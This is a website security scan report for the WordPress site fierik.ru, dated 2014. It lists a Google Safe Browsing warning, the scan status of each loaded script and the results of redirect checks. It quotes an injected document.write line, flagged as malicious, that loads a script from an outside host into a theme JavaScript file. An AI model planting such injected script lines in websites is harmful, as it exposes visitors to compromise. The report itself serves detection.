Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fierik.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fierik.ru/ | 200 OK Content-Length: 60666 Content-Type: text/html | clean |
http://folee.biz/js_gul3boajrk0?lp=1&src=js | 200 OK Content-Length: 352 Content-Type: text/javascript | clean |
http://fierik.ru/wp-content/themes/fluidzine/lib/js/dropmenu.jquery.js | 200 OK Content-Length: 54199 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script type="text/javascript" src="//counter.yadro.li/fierik"></script>'); (function(){if(window.jQuery)var _jQuery=window.jQuery;var jQuery=window.jQuery=function(selector,context){return new jQuery.prototype.init(selector,context);};if(window.$)var _$=window.$;window.$=jQuery;var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/;var isSimple=/^.[^:#\[\.]*$/;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(sele Antivirus reports:
| ||
http://fierik.ru/wp-content/themes/fluidzine/lib/js/dropmenu.js | 200 OK Content-Length: 694 Content-Type: application/x-javascript | clean |
http://fierik.ru/wp-content/themes/fluidzine/lib/js/jquery-1.4.2.js | 200 OK Content-Length: 170095 Content-Type: application/x-javascript | clean |
http://fierik.ru/wp-content/plugins/vkontakteult/js/jquery-1.6.1.min.js?ver=1.6.1 | 200 OK Content-Length: 91359 Content-Type: application/x-javascript | clean |
http://fierik.ru/wp-content/plugins/vkontakteult/js/jquery.cookie.js?ver=3.8 | 200 OK Content-Length: 3639 Content-Type: application/x-javascript | clean |
http://fierik.ru/wp-content/plugins/vkontakteult/js/vkfullult_stat.js?ver=3.8 | 200 OK Content-Length: 379 Content-Type: application/x-javascript | clean |
http://userapi.com/js/api/openapi.js?ver=3.8 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js?ver=3.8 | 200 OK Content-Length: 99688 Content-Type: application/javascript | clean |
http://stg.odnoklassniki.ru/share/odkl_share.js?ver=3.8 | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/ru_RU/all.js | 200 OK Content-Length: 168350 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12127 Content-Type: application/javascript | clean |
http://js.ru.redtram.com/n4p/0/26/ticker_26796.js | 200 OK Content-Length: 15129 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?42 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fierik.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Aug 2014 06:32:57 GMT
Server: nginx/1.0.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://fierik.ru/xmlrpc.php
X-Powered-By: PHP/5.2.14
GET / HTTP/1.1
Host: fierik.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Aug 2014 06:32:57 GMT
Server: nginx/1.0.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://fierik.ru/xmlrpc.php
X-Powered-By: PHP/5.2.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: fierik.ru
Referer: http://www.google.com/search?q=fierik.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fierik.ru
Referer: http://www.google.com/search?q=fierik.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.